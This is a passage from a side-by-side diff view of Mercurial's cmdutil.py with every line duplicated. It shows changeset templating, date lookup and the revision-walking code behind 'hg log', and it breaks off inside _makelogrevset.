1876 return logtemplatespec(None, None)
1876 return logtemplatespec(None, None)
1877
1877
1878 return formatter.lookuptemplate(ui, 'changeset', tmpl)
1878 return formatter.lookuptemplate(ui, 'changeset', tmpl)
1879
1879
1880 def makelogtemplater(ui, repo, tmpl, buffered=False):
1880 def makelogtemplater(ui, repo, tmpl, buffered=False):
1881 """Create a changeset_templater from a literal template 'tmpl'"""
1881 """Create a changeset_templater from a literal template 'tmpl'"""
1882 spec = logtemplatespec(tmpl, None)
1882 spec = logtemplatespec(tmpl, None)
1883 return changeset_templater(ui, repo, spec, buffered=buffered)
1883 return changeset_templater(ui, repo, spec, buffered=buffered)
1884
1884
1885 def show_changeset(ui, repo, opts, buffered=False):
1885 def show_changeset(ui, repo, opts, buffered=False):
1886 """show one changeset using template or regular display.
1886 """show one changeset using template or regular display.
1887
1887
1888 Display format will be the first non-empty hit of:
1888 Display format will be the first non-empty hit of:
1889 1. option 'template'
1889 1. option 'template'
1890 2. option 'style'
1890 2. option 'style'
1891 3. [ui] setting 'logtemplate'
1891 3. [ui] setting 'logtemplate'
1892 4. [ui] setting 'style'
1892 4. [ui] setting 'style'
1893 If all of these values are either the unset or the empty string,
1893 If all of these values are either the unset or the empty string,
1894 regular display via changeset_printer() is done.
1894 regular display via changeset_printer() is done.
1895 """
1895 """
1896 # options
1896 # options
1897 matchfn = None
1897 matchfn = None
1898 if opts.get('patch') or opts.get('stat'):
1898 if opts.get('patch') or opts.get('stat'):
1899 matchfn = scmutil.matchall(repo)
1899 matchfn = scmutil.matchall(repo)
1900
1900
1901 if opts.get('template') == 'json':
1901 if opts.get('template') == 'json':
1902 return jsonchangeset(ui, repo, matchfn, opts, buffered)
1902 return jsonchangeset(ui, repo, matchfn, opts, buffered)
1903
1903
1904 spec = _lookuplogtemplate(ui, opts.get('template'), opts.get('style'))
1904 spec = _lookuplogtemplate(ui, opts.get('template'), opts.get('style'))
1905
1905
1906 if not spec.ref and not spec.tmpl and not spec.mapfile:
1906 if not spec.ref and not spec.tmpl and not spec.mapfile:
1907 return changeset_printer(ui, repo, matchfn, opts, buffered)
1907 return changeset_printer(ui, repo, matchfn, opts, buffered)
1908
1908
1909 return changeset_templater(ui, repo, spec, matchfn, opts, buffered)
1909 return changeset_templater(ui, repo, spec, matchfn, opts, buffered)
1910
1910
1911 def showmarker(fm, marker, index=None):
1911 def showmarker(fm, marker, index=None):
1912 """utility function to display obsolescence marker in a readable way
1912 """utility function to display obsolescence marker in a readable way
1913
1913
1914 To be used by debug function."""
1914 To be used by debug function."""
1915 if index is not None:
1915 if index is not None:
1916 fm.write('index', '%i ', index)
1916 fm.write('index', '%i ', index)
1917 fm.write('precnode', '%s ', hex(marker.prednode()))
1917 fm.write('precnode', '%s ', hex(marker.prednode()))
1918 succs = marker.succnodes()
1918 succs = marker.succnodes()
1919 fm.condwrite(succs, 'succnodes', '%s ',
1919 fm.condwrite(succs, 'succnodes', '%s ',
1920 fm.formatlist(map(hex, succs), name='node'))
1920 fm.formatlist(map(hex, succs), name='node'))
1921 fm.write('flag', '%X ', marker.flags())
1921 fm.write('flag', '%X ', marker.flags())
1922 parents = marker.parentnodes()
1922 parents = marker.parentnodes()
1923 if parents is not None:
1923 if parents is not None:
1924 fm.write('parentnodes', '{%s} ',
1924 fm.write('parentnodes', '{%s} ',
1925 fm.formatlist(map(hex, parents), name='node', sep=', '))
1925 fm.formatlist(map(hex, parents), name='node', sep=', '))
1926 fm.write('date', '(%s) ', fm.formatdate(marker.date()))
1926 fm.write('date', '(%s) ', fm.formatdate(marker.date()))
1927 meta = marker.metadata().copy()
1927 meta = marker.metadata().copy()
1928 meta.pop('date', None)
1928 meta.pop('date', None)
1929 fm.write('metadata', '{%s}', fm.formatdict(meta, fmt='%r: %r', sep=', '))
1929 fm.write('metadata', '{%s}', fm.formatdict(meta, fmt='%r: %r', sep=', '))
1930 fm.plain('\n')
1930 fm.plain('\n')
1931
1931
1932 def finddate(ui, repo, date):
1932 def finddate(ui, repo, date):
1933 """Find the tipmost changeset that matches the given date spec"""
1933 """Find the tipmost changeset that matches the given date spec"""
1934
1934
1935 df = util.matchdate(date)
1935 df = util.matchdate(date)
1936 m = scmutil.matchall(repo)
1936 m = scmutil.matchall(repo)
1937 results = {}
1937 results = {}
1938
1938
1939 def prep(ctx, fns):
1939 def prep(ctx, fns):
1940 d = ctx.date()
1940 d = ctx.date()
1941 if df(d[0]):
1941 if df(d[0]):
1942 results[ctx.rev()] = d
1942 results[ctx.rev()] = d
1943
1943
1944 for ctx in walkchangerevs(repo, m, {'rev': None}, prep):
1944 for ctx in walkchangerevs(repo, m, {'rev': None}, prep):
1945 rev = ctx.rev()
1945 rev = ctx.rev()
1946 if rev in results:
1946 if rev in results:
1947 ui.status(_("found revision %s from %s\n") %
1947 ui.status(_("found revision %s from %s\n") %
1948 (rev, util.datestr(results[rev])))
1948 (rev, util.datestr(results[rev])))
1949 return '%d' % rev
1949 return '%d' % rev
1950
1950
1951 raise error.Abort(_("revision matching date not found"))
1951 raise error.Abort(_("revision matching date not found"))
1952
1952
1953 def increasingwindows(windowsize=8, sizelimit=512):
1953 def increasingwindows(windowsize=8, sizelimit=512):
1954 while True:
1954 while True:
1955 yield windowsize
1955 yield windowsize
1956 if windowsize < sizelimit:
1956 if windowsize < sizelimit:
1957 windowsize *= 2
1957 windowsize *= 2
1958
1958
1959 class FileWalkError(Exception):
1959 class FileWalkError(Exception):
1960 pass
1960 pass
1961
1961
1962 def walkfilerevs(repo, match, follow, revs, fncache):
1962 def walkfilerevs(repo, match, follow, revs, fncache):
1963 '''Walks the file history for the matched files.
1963 '''Walks the file history for the matched files.
1964
1964
1965 Returns the changeset revs that are involved in the file history.
1965 Returns the changeset revs that are involved in the file history.
1966
1966
1967 Throws FileWalkError if the file history can't be walked using
1967 Throws FileWalkError if the file history can't be walked using
1968 filelogs alone.
1968 filelogs alone.
1969 '''
1969 '''
1970 wanted = set()
1970 wanted = set()
1971 copies = []
1971 copies = []
1972 minrev, maxrev = min(revs), max(revs)
1972 minrev, maxrev = min(revs), max(revs)
1973 def filerevgen(filelog, last):
1973 def filerevgen(filelog, last):
1974 """
1974 """
1975 Only files, no patterns. Check the history of each file.
1975 Only files, no patterns. Check the history of each file.
1976
1976
1977 Examines filelog entries within minrev, maxrev linkrev range
1977 Examines filelog entries within minrev, maxrev linkrev range
1978 Returns an iterator yielding (linkrev, parentlinkrevs, copied)
1978 Returns an iterator yielding (linkrev, parentlinkrevs, copied)
1979 tuples in backwards order
1979 tuples in backwards order
1980 """
1980 """
1981 cl_count = len(repo)
1981 cl_count = len(repo)
1982 revs = []
1982 revs = []
1983 for j in xrange(0, last + 1):
1983 for j in xrange(0, last + 1):
1984 linkrev = filelog.linkrev(j)
1984 linkrev = filelog.linkrev(j)
1985 if linkrev < minrev:
1985 if linkrev < minrev:
1986 continue
1986 continue
1987 # only yield rev for which we have the changelog, it can
1987 # only yield rev for which we have the changelog, it can
1988 # happen while doing "hg log" during a pull or commit
1988 # happen while doing "hg log" during a pull or commit
1989 if linkrev >= cl_count:
1989 if linkrev >= cl_count:
1990 break
1990 break
1991
1991
1992 parentlinkrevs = []
1992 parentlinkrevs = []
1993 for p in filelog.parentrevs(j):
1993 for p in filelog.parentrevs(j):
1994 if p != nullrev:
1994 if p != nullrev:
1995 parentlinkrevs.append(filelog.linkrev(p))
1995 parentlinkrevs.append(filelog.linkrev(p))
1996 n = filelog.node(j)
1996 n = filelog.node(j)
1997 revs.append((linkrev, parentlinkrevs,
1997 revs.append((linkrev, parentlinkrevs,
1998 follow and filelog.renamed(n)))
1998 follow and filelog.renamed(n)))
1999
1999
2000 return reversed(revs)
2000 return reversed(revs)
2001 def iterfiles():
2001 def iterfiles():
2002 pctx = repo['.']
2002 pctx = repo['.']
2003 for filename in match.files():
2003 for filename in match.files():
2004 if follow:
2004 if follow:
2005 if filename not in pctx:
2005 if filename not in pctx:
2006 raise error.Abort(_('cannot follow file not in parent '
2006 raise error.Abort(_('cannot follow file not in parent '
2007 'revision: "%s"') % filename)
2007 'revision: "%s"') % filename)
2008 yield filename, pctx[filename].filenode()
2008 yield filename, pctx[filename].filenode()
2009 else:
2009 else:
2010 yield filename, None
2010 yield filename, None
2011 for filename_node in copies:
2011 for filename_node in copies:
2012 yield filename_node
2012 yield filename_node
2013
2013
2014 for file_, node in iterfiles():
2014 for file_, node in iterfiles():
2015 filelog = repo.file(file_)
2015 filelog = repo.file(file_)
2016 if not len(filelog):
2016 if not len(filelog):
2017 if node is None:
2017 if node is None:
2018 # A zero count may be a directory or deleted file, so
2018 # A zero count may be a directory or deleted file, so
2019 # try to find matching entries on the slow path.
2019 # try to find matching entries on the slow path.
2020 if follow:
2020 if follow:
2021 raise error.Abort(
2021 raise error.Abort(
2022 _('cannot follow nonexistent file: "%s"') % file_)
2022 _('cannot follow nonexistent file: "%s"') % file_)
2023 raise FileWalkError("Cannot walk via filelog")
2023 raise FileWalkError("Cannot walk via filelog")
2024 else:
2024 else:
2025 continue
2025 continue
2026
2026
2027 if node is None:
2027 if node is None:
2028 last = len(filelog) - 1
2028 last = len(filelog) - 1
2029 else:
2029 else:
2030 last = filelog.rev(node)
2030 last = filelog.rev(node)
2031
2031
2032 # keep track of all ancestors of the file
2032 # keep track of all ancestors of the file
2033 ancestors = {filelog.linkrev(last)}
2033 ancestors = {filelog.linkrev(last)}
2034
2034
2035 # iterate from latest to oldest revision
2035 # iterate from latest to oldest revision
2036 for rev, flparentlinkrevs, copied in filerevgen(filelog, last):
2036 for rev, flparentlinkrevs, copied in filerevgen(filelog, last):
2037 if not follow:
2037 if not follow:
2038 if rev > maxrev:
2038 if rev > maxrev:
2039 continue
2039 continue
2040 else:
2040 else:
2041 # Note that last might not be the first interesting
2041 # Note that last might not be the first interesting
2042 # rev to us:
2042 # rev to us:
2043 # if the file has been changed after maxrev, we'll
2043 # if the file has been changed after maxrev, we'll
2044 # have linkrev(last) > maxrev, and we still need
2044 # have linkrev(last) > maxrev, and we still need
2045 # to explore the file graph
2045 # to explore the file graph
2046 if rev not in ancestors:
2046 if rev not in ancestors:
2047 continue
2047 continue
2048 # XXX insert 1327 fix here
2048 # XXX insert 1327 fix here
2049 if flparentlinkrevs:
2049 if flparentlinkrevs:
2050 ancestors.update(flparentlinkrevs)
2050 ancestors.update(flparentlinkrevs)
2051
2051
2052 fncache.setdefault(rev, []).append(file_)
2052 fncache.setdefault(rev, []).append(file_)
2053 wanted.add(rev)
2053 wanted.add(rev)
2054 if copied:
2054 if copied:
2055 copies.append(copied)
2055 copies.append(copied)
2056
2056
2057 return wanted
2057 return wanted
2058
2058
2059 class _followfilter(object):
2059 class _followfilter(object):
2060 def __init__(self, repo, onlyfirst=False):
2060 def __init__(self, repo, onlyfirst=False):
2061 self.repo = repo
2061 self.repo = repo
2062 self.startrev = nullrev
2062 self.startrev = nullrev
2063 self.roots = set()
2063 self.roots = set()
2064 self.onlyfirst = onlyfirst
2064 self.onlyfirst = onlyfirst
2065
2065
2066 def match(self, rev):
2066 def match(self, rev):
2067 def realparents(rev):
2067 def realparents(rev):
2068 if self.onlyfirst:
2068 if self.onlyfirst:
2069 return self.repo.changelog.parentrevs(rev)[0:1]
2069 return self.repo.changelog.parentrevs(rev)[0:1]
2070 else:
2070 else:
2071 return filter(lambda x: x != nullrev,
2071 return filter(lambda x: x != nullrev,
2072 self.repo.changelog.parentrevs(rev))
2072 self.repo.changelog.parentrevs(rev))
2073
2073
2074 if self.startrev == nullrev:
2074 if self.startrev == nullrev:
2075 self.startrev = rev
2075 self.startrev = rev
2076 return True
2076 return True
2077
2077
2078 if rev > self.startrev:
2078 if rev > self.startrev:
2079 # forward: all descendants
2079 # forward: all descendants
2080 if not self.roots:
2080 if not self.roots:
2081 self.roots.add(self.startrev)
2081 self.roots.add(self.startrev)
2082 for parent in realparents(rev):
2082 for parent in realparents(rev):
2083 if parent in self.roots:
2083 if parent in self.roots:
2084 self.roots.add(rev)
2084 self.roots.add(rev)
2085 return True
2085 return True
2086 else:
2086 else:
2087 # backwards: all parents
2087 # backwards: all parents
2088 if not self.roots:
2088 if not self.roots:
2089 self.roots.update(realparents(self.startrev))
2089 self.roots.update(realparents(self.startrev))
2090 if rev in self.roots:
2090 if rev in self.roots:
2091 self.roots.remove(rev)
2091 self.roots.remove(rev)
2092 self.roots.update(realparents(rev))
2092 self.roots.update(realparents(rev))
2093 return True
2093 return True
2094
2094
2095 return False
2095 return False
2096
2096
2097 def walkchangerevs(repo, match, opts, prepare):
2097 def walkchangerevs(repo, match, opts, prepare):
2098 '''Iterate over files and the revs in which they changed.
2098 '''Iterate over files and the revs in which they changed.
2099
2099
2100 Callers most commonly need to iterate backwards over the history
2100 Callers most commonly need to iterate backwards over the history
2101 in which they are interested. Doing so has awful (quadratic-looking)
2101 in which they are interested. Doing so has awful (quadratic-looking)
2102 performance, so we use iterators in a "windowed" way.
2102 performance, so we use iterators in a "windowed" way.
2103
2103
2104 We walk a window of revisions in the desired order. Within the
2104 We walk a window of revisions in the desired order. Within the
2105 window, we first walk forwards to gather data, then in the desired
2105 window, we first walk forwards to gather data, then in the desired
2106 order (usually backwards) to display it.
2106 order (usually backwards) to display it.
2107
2107
2108 This function returns an iterator yielding contexts. Before
2108 This function returns an iterator yielding contexts. Before
2109 yielding each context, the iterator will first call the prepare
2109 yielding each context, the iterator will first call the prepare
2110 function on each context in the window in forward order.'''
2110 function on each context in the window in forward order.'''
2111
2111
2112 follow = opts.get('follow') or opts.get('follow_first')
2112 follow = opts.get('follow') or opts.get('follow_first')
2113 revs = _logrevs(repo, opts)
2113 revs = _logrevs(repo, opts)
2114 if not revs:
2114 if not revs:
2115 return []
2115 return []
2116 wanted = set()
2116 wanted = set()
2117 slowpath = match.anypats() or ((match.isexact() or match.prefix()) and
2117 slowpath = match.anypats() or ((match.isexact() or match.prefix()) and
2118 opts.get('removed'))
2118 opts.get('removed'))
2119 fncache = {}
2119 fncache = {}
2120 change = repo.changectx
2120 change = repo.changectx
2121
2121
2122 # First step is to fill wanted, the set of revisions that we want to yield.
2122 # First step is to fill wanted, the set of revisions that we want to yield.
2123 # When it does not induce extra cost, we also fill fncache for revisions in
2123 # When it does not induce extra cost, we also fill fncache for revisions in
2124 # wanted: a cache of filenames that were changed (ctx.files()) and that
2124 # wanted: a cache of filenames that were changed (ctx.files()) and that
2125 # match the file filtering conditions.
2125 # match the file filtering conditions.
2126
2126
2127 if match.always():
2127 if match.always():
2128 # No files, no patterns. Display all revs.
2128 # No files, no patterns. Display all revs.
2129 wanted = revs
2129 wanted = revs
2130 elif not slowpath:
2130 elif not slowpath:
2131 # We only have to read through the filelog to find wanted revisions
2131 # We only have to read through the filelog to find wanted revisions
2132
2132
2133 try:
2133 try:
2134 wanted = walkfilerevs(repo, match, follow, revs, fncache)
2134 wanted = walkfilerevs(repo, match, follow, revs, fncache)
2135 except FileWalkError:
2135 except FileWalkError:
2136 slowpath = True
2136 slowpath = True
2137
2137
2138 # We decided to fall back to the slowpath because at least one
2138 # We decided to fall back to the slowpath because at least one
2139 # of the paths was not a file. Check to see if at least one of them
2139 # of the paths was not a file. Check to see if at least one of them
2140 # existed in history, otherwise simply return
2140 # existed in history, otherwise simply return
2141 for path in match.files():
2141 for path in match.files():
2142 if path == '.' or path in repo.store:
2142 if path == '.' or path in repo.store:
2143 break
2143 break
2144 else:
2144 else:
2145 return []
2145 return []
2146
2146
2147 if slowpath:
2147 if slowpath:
2148 # We have to read the changelog to match filenames against
2148 # We have to read the changelog to match filenames against
2149 # changed files
2149 # changed files
2150
2150
2151 if follow:
2151 if follow:
2152 raise error.Abort(_('can only follow copies/renames for explicit '
2152 raise error.Abort(_('can only follow copies/renames for explicit '
2153 'filenames'))
2153 'filenames'))
2154
2154
2155 # The slow path checks files modified in every changeset.
2155 # The slow path checks files modified in every changeset.
2156 # This is really slow on large repos, so compute the set lazily.
2156 # This is really slow on large repos, so compute the set lazily.
2157 class lazywantedset(object):
2157 class lazywantedset(object):
2158 def __init__(self):
2158 def __init__(self):
2159 self.set = set()
2159 self.set = set()
2160 self.revs = set(revs)
2160 self.revs = set(revs)
2161
2161
2162 # No need to worry about locality here because it will be accessed
2162 # No need to worry about locality here because it will be accessed
2163 # in the same order as the increasing window below.
2163 # in the same order as the increasing window below.
2164 def __contains__(self, value):
2164 def __contains__(self, value):
2165 if value in self.set:
2165 if value in self.set:
2166 return True
2166 return True
2167 elif not value in self.revs:
2167 elif not value in self.revs:
2168 return False
2168 return False
2169 else:
2169 else:
2170 self.revs.discard(value)
2170 self.revs.discard(value)
2171 ctx = change(value)
2171 ctx = change(value)
2172 matches = filter(match, ctx.files())
2172 matches = filter(match, ctx.files())
2173 if matches:
2173 if matches:
2174 fncache[value] = matches
2174 fncache[value] = matches
2175 self.set.add(value)
2175 self.set.add(value)
2176 return True
2176 return True
2177 return False
2177 return False
2178
2178
2179 def discard(self, value):
2179 def discard(self, value):
2180 self.revs.discard(value)
2180 self.revs.discard(value)
2181 self.set.discard(value)
2181 self.set.discard(value)
2182
2182
2183 wanted = lazywantedset()
2183 wanted = lazywantedset()
2184
2184
2185 # it might be worthwhile to do this in the iterator if the rev range
2185 # it might be worthwhile to do this in the iterator if the rev range
2186 # is descending and the prune args are all within that range
2186 # is descending and the prune args are all within that range
2187 for rev in opts.get('prune', ()):
2187 for rev in opts.get('prune', ()):
2188 rev = repo[rev].rev()
2188 rev = repo[rev].rev()
2189 ff = _followfilter(repo)
2189 ff = _followfilter(repo)
2190 stop = min(revs[0], revs[-1])
2190 stop = min(revs[0], revs[-1])
2191 for x in xrange(rev, stop - 1, -1):
2191 for x in xrange(rev, stop - 1, -1):
2192 if ff.match(x):
2192 if ff.match(x):
2193 wanted = wanted - [x]
2193 wanted = wanted - [x]
2194
2194
2195 # Now that wanted is correctly initialized, we can iterate over the
2195 # Now that wanted is correctly initialized, we can iterate over the
2196 # revision range, yielding only revisions in wanted.
2196 # revision range, yielding only revisions in wanted.
2197 def iterate():
2197 def iterate():
2198 if follow and match.always():
2198 if follow and match.always():
2199 ff = _followfilter(repo, onlyfirst=opts.get('follow_first'))
2199 ff = _followfilter(repo, onlyfirst=opts.get('follow_first'))
2200 def want(rev):
2200 def want(rev):
2201 return ff.match(rev) and rev in wanted
2201 return ff.match(rev) and rev in wanted
2202 else:
2202 else:
2203 def want(rev):
2203 def want(rev):
2204 return rev in wanted
2204 return rev in wanted
2205
2205
2206 it = iter(revs)
2206 it = iter(revs)
2207 stopiteration = False
2207 stopiteration = False
2208 for windowsize in increasingwindows():
2208 for windowsize in increasingwindows():
2209 nrevs = []
2209 nrevs = []
2210 for i in xrange(windowsize):
2210 for i in xrange(windowsize):
2211 rev = next(it, None)
2211 rev = next(it, None)
2212 if rev is None:
2212 if rev is None:
2213 stopiteration = True
2213 stopiteration = True
2214 break
2214 break
2215 elif want(rev):
2215 elif want(rev):
2216 nrevs.append(rev)
2216 nrevs.append(rev)
2217 for rev in sorted(nrevs):
2217 for rev in sorted(nrevs):
2218 fns = fncache.get(rev)
2218 fns = fncache.get(rev)
2219 ctx = change(rev)
2219 ctx = change(rev)
2220 if not fns:
2220 if not fns:
2221 def fns_generator():
2221 def fns_generator():
2222 for f in ctx.files():
2222 for f in ctx.files():
2223 if match(f):
2223 if match(f):
2224 yield f
2224 yield f
2225 fns = fns_generator()
2225 fns = fns_generator()
2226 prepare(ctx, fns)
2226 prepare(ctx, fns)
2227 for rev in nrevs:
2227 for rev in nrevs:
2228 yield change(rev)
2228 yield change(rev)
2229
2229
2230 if stopiteration:
2230 if stopiteration:
2231 break
2231 break
2232
2232
2233 return iterate()
2233 return iterate()
2234
2234
2235 def _makefollowlogfilematcher(repo, files, followfirst):
2235 def _makefollowlogfilematcher(repo, files, followfirst):
2236 # When displaying a revision with --patch --follow FILE, we have
2236 # When displaying a revision with --patch --follow FILE, we have
2237 # to know which file of the revision must be diffed. With
2237 # to know which file of the revision must be diffed. With
2238 # --follow, we want the names of the ancestors of FILE in the
2238 # --follow, we want the names of the ancestors of FILE in the
2239 # revision, stored in "fcache". "fcache" is populated by
2239 # revision, stored in "fcache". "fcache" is populated by
2240 # reproducing the graph traversal already done by --follow revset
2240 # reproducing the graph traversal already done by --follow revset
2241 # and relating revs to file names (which is not "correct" but
2241 # and relating revs to file names (which is not "correct" but
2242 # good enough).
2242 # good enough).
2243 fcache = {}
2243 fcache = {}
2244 fcacheready = [False]
2244 fcacheready = [False]
2245 pctx = repo['.']
2245 pctx = repo['.']
2246
2246
2247 def populate():
2247 def populate():
2248 for fn in files:
2248 for fn in files:
2249 fctx = pctx[fn]
2249 fctx = pctx[fn]
2250 fcache.setdefault(fctx.introrev(), set()).add(fctx.path())
2250 fcache.setdefault(fctx.introrev(), set()).add(fctx.path())
2251 for c in fctx.ancestors(followfirst=followfirst):
2251 for c in fctx.ancestors(followfirst=followfirst):
2252 fcache.setdefault(c.rev(), set()).add(c.path())
2252 fcache.setdefault(c.rev(), set()).add(c.path())
2253
2253
2254 def filematcher(rev):
2254 def filematcher(rev):
2255 if not fcacheready[0]:
2255 if not fcacheready[0]:
2256 # Lazy initialization
2256 # Lazy initialization
2257 fcacheready[0] = True
2257 fcacheready[0] = True
2258 populate()
2258 populate()
2259 return scmutil.matchfiles(repo, fcache.get(rev, []))
2259 return scmutil.matchfiles(repo, fcache.get(rev, []))
2260
2260
2261 return filematcher
2261 return filematcher
2262
2262
2263 def _makenofollowlogfilematcher(repo, pats, opts):
2263 def _makenofollowlogfilematcher(repo, pats, opts):
2264 '''hook for extensions to override the filematcher for non-follow cases'''
2264 '''hook for extensions to override the filematcher for non-follow cases'''
2265 return None
2265 return None
2266
2266
2267 def _makelogrevset(repo, pats, opts, revs):
2267 def _makelogrevset(repo, pats, opts, revs):
2268 """Return (expr, filematcher) where expr is a revset string built
2268 """Return (expr, filematcher) where expr is a revset string built
2269 from log options and file patterns or None. If --stat or --patch
2269 from log options and file patterns or None. If --stat or --patch
2270 are not passed filematcher is None. Otherwise it is a callable
2270 are not passed filematcher is None. Otherwise it is a callable
2271 taking a revision number and returning a match objects filtering
2271 taking a revision number and returning a match objects filtering
2272 the files to be detailed when displaying the revision.
2272 the files to be detailed when displaying the revision.
2273 """
2273 """
2274 opt2revset = {
2274 opt2revset = {
2275 'no_merges': ('not merge()', None),
2275 'no_merges': ('not merge()', None),
2276 'only_merges': ('merge()', None),
2276 'only_merges': ('merge()', None),
2277 '_ancestors': ('ancestors(%(val)s)', None),
2277 '_ancestors': ('ancestors(%(val)s)', None),
2278 '_fancestors': ('_firstancestors(%(val)s)', None),
2278 '_fancestors': ('_firstancestors(%(val)s)', None),
2279 '_descendants': ('descendants(%(val)s)', None),
2279 '_descendants': ('descendants(%(val)s)', None),
2280 '_fdescendants': ('_firstdescendants(%(val)s)', None),
2280 '_fdescendants': ('_firstdescendants(%(val)s)', None),
2281 '_matchfiles': ('_matchfiles(%(val)s)', None),
2281 '_matchfiles': ('_matchfiles(%(val)s)', None),
2282 'date': ('date(%(val)r)', None),
2282 'date': ('date(%(val)r)', None),
2283 'branch': ('branch(%(val)r)', ' or '),
2283 'branch': ('branch(%(val)r)', ' or '),
2284 '_patslog': ('filelog(%(val)r)', ' or '),
2284 '_patslog': ('filelog(%(val)r)', ' or '),
2285 '_patsfollow': ('follow(%(val)r)', ' or '),
2285 '_patsfollow': ('follow(%(val)r)', ' or '),
2286 '_patsfollowfirst': ('_followfirst(%(val)r)', ' or '),
2286 '_patsfollowfirst': ('_followfirst(%(val)r)', ' or '),
2287 'keyword': ('keyword(%(val)r)', ' or '),
2287 'keyword': ('keyword(%(val)r)', ' or '),
2288 'prune': ('not (%(val)r or ancestors(%(val)r))', ' and '),
2288 'prune': ('not (%(val)r or ancestors(%(val)r))', ' and '),
2289 'user': ('user(%(val)r)', ' or '),
2289 'user': ('user(%(val)r)', ' or '),
2290 }
2290 }
2291
2291
2292 opts = dict(opts)
2292 opts = dict(opts)
2293 # follow or not follow?
2293 # follow or not follow?
2294 follow = opts.get('follow') or opts.get('follow_first')
2294 follow = opts.get('follow') or opts.get('follow_first')
2295 if opts.get('follow_first'):
2295 if opts.get('follow_first'):
2296 followfirst = 1
2296 followfirst = 1
2297 else:
2297 else:
2298 followfirst = 0
2298 followfirst = 0
2299 # --follow with FILE behavior depends on revs...
2299 # --follow with FILE behavior depends on revs...
2300 it = iter(revs)
2300 it = iter(revs)
2301 startrev = next(it)
2301 startrev = next(it)
2302 followdescendants = startrev < next(it, startrev)
2302 followdescendants = startrev < next(it, startrev)
2303
2303
2304 # branch and only_branch are really aliases and must be handled at
2304 # branch and only_branch are really aliases and must be handled at
2305 # the same time
2305 # the same time
2306 opts['branch'] = opts.get('branch', []) + opts.get('only_branch', [])
2306 opts['branch'] = opts.get('branch', []) + opts.get('only_branch', [])
2307 opts['branch'] = [repo.lookupbranch(b) for b in opts['branch']]
2307 opts['branch'] = [repo.lookupbranch(b) for b in opts['branch']]
2308 # pats/include/exclude are passed to match.match() directly in
2308 # pats/include/exclude are passed to match.match() directly in
2309 # _matchfiles() revset but walkchangerevs() builds its matcher with
2309 # _matchfiles() revset but walkchangerevs() builds its matcher with
2310 # scmutil.match(). The difference is input pats are globbed on
2310 # scmutil.match(). The difference is input pats are globbed on
2311 # platforms without shell expansion (windows).
2311 # platforms without shell expansion (windows).
2312 wctx = repo[None]
2312 wctx = repo[None]
2313 match, pats = scmutil.matchandpats(wctx, pats, opts)
2313 match, pats = scmutil.matchandpats(wctx, pats, opts)
2314 slowpath = match.anypats() or ((match.isexact() or match.prefix()) and
2314 slowpath = match.anypats() or ((match.isexact() or match.prefix()) and
2315 opts.get('removed'))
2315 opts.get('removed'))
2316 if not slowpath:
2316 if not slowpath:
2317 for f in match.files():
2317 for f in match.files():
2318 if follow and f not in wctx:
2318 if follow and f not in wctx:
2319 # If the file exists, it may be a directory, so let it
2319 # If the file exists, it may be a directory, so let it
2320 # take the slow path.
2320 # take the slow path.
2321 if os.path.exists(repo.wjoin(f)):
2321 if os.path.exists(repo.wjoin(f)):
2322 slowpath = True
2322 slowpath = True
2323 continue
2323 continue
2324 else:
2324 else:
2325 raise error.Abort(_('cannot follow file not in parent '
2325 raise error.Abort(_('cannot follow file not in parent '
2326 'revision: "%s"') % f)
2326 'revision: "%s"') % f)
2327 filelog = repo.file(f)
2327 filelog = repo.file(f)
2328 if not filelog:
2328 if not filelog:
2329 # A zero count may be a directory or deleted file, so
2329 # A zero count may be a directory or deleted file, so
2330 # try to find matching entries on the slow path.
2330 # try to find matching entries on the slow path.
2331 if follow:
2331 if follow:
2332 raise error.Abort(
2332 raise error.Abort(
2333 _('cannot follow nonexistent file: "%s"') % f)
2333 _('cannot follow nonexistent file: "%s"') % f)
2334 slowpath = True
2334 slowpath = True
2335
2335
2336 # We decided to fall back to the slowpath because at least one
2336 # We decided to fall back to the slowpath because at least one
2337 # of the paths was not a file. Check to see if at least one of them
2337 # of the paths was not a file. Check to see if at least one of them
2338 # existed in history - in that case, we'll continue down the
2338 # existed in history - in that case, we'll continue down the
2339 # slowpath; otherwise, we can turn off the slowpath
2339 # slowpath; otherwise, we can turn off the slowpath
2340 if slowpath:
2340 if slowpath:
2341 for path in match.files():
2341 for path in match.files():
2342 if path == '.' or path in repo.store:
2342 if path == '.' or path in repo.store:
2343 break
2343 break
2344 else:
2344 else:
2345 slowpath = False
2345 slowpath = False
2346
2346
2347 fpats = ('_patsfollow', '_patsfollowfirst')
2347 fpats = ('_patsfollow', '_patsfollowfirst')
2348 fnopats = (('_ancestors', '_fancestors'),
2348 fnopats = (('_ancestors', '_fancestors'),
2349 ('_descendants', '_fdescendants'))
2349 ('_descendants', '_fdescendants'))
2350 if slowpath:
2350 if slowpath:
2351 # See walkchangerevs() slow path.
2351 # See walkchangerevs() slow path.
2352 #
2352 #
2353 # pats/include/exclude cannot be represented as separate
2353 # pats/include/exclude cannot be represented as separate
2354 # revset expressions as their filtering logic applies at file
2354 # revset expressions as their filtering logic applies at file
2355 # level. For instance "-I a -X a" matches a revision touching
2355 # level. For instance "-I a -X a" matches a revision touching
2356 # "a" and "b" while "file(a) and not file(b)" does
2356 # "a" and "b" while "file(a) and not file(b)" does
2357 # not. Besides, filesets are evaluated against the working
2357 # not. Besides, filesets are evaluated against the working
2358 # directory.
2358 # directory.
2359 matchargs = ['r:', 'd:relpath']
2359 matchargs = ['r:', 'd:relpath']
2360 for p in pats:
2360 for p in pats:
2361 matchargs.append('p:' + p)
2361 matchargs.append('p:' + p)
2362 for p in opts.get('include', []):
2362 for p in opts.get('include', []):
2363 matchargs.append('i:' + p)
2363 matchargs.append('i:' + p)
2364 for p in opts.get('exclude', []):
2364 for p in opts.get('exclude', []):
2365 matchargs.append('x:' + p)
2365 matchargs.append('x:' + p)
2366 matchargs = ','.join(('%r' % p) for p in matchargs)
2366 matchargs = ','.join(('%r' % p) for p in matchargs)
2367 opts['_matchfiles'] = matchargs
2367 opts['_matchfiles'] = matchargs
2368 if follow:
2368 if follow:
2369 opts[fnopats[0][followfirst]] = '.'
2369 opts[fnopats[0][followfirst]] = '.'
2370 else:
2370 else:
2371 if follow:
2371 if follow:
2372 if pats:
2372 if pats:
2373 # follow() revset interprets its file argument as a
2373 # follow() revset interprets its file argument as a
2374 # manifest entry, so use match.files(), not pats.
2374 # manifest entry, so use match.files(), not pats.
2375 opts[fpats[followfirst]] = list(match.files())
2375 opts[fpats[followfirst]] = list(match.files())
2376 else:
2376 else:
2377 op = fnopats[followdescendants][followfirst]
2377 op = fnopats[followdescendants][followfirst]
2378 opts[op] = 'rev(%d)' % startrev
2378 opts[op] = 'rev(%d)' % startrev
2379 else:
2379 else:
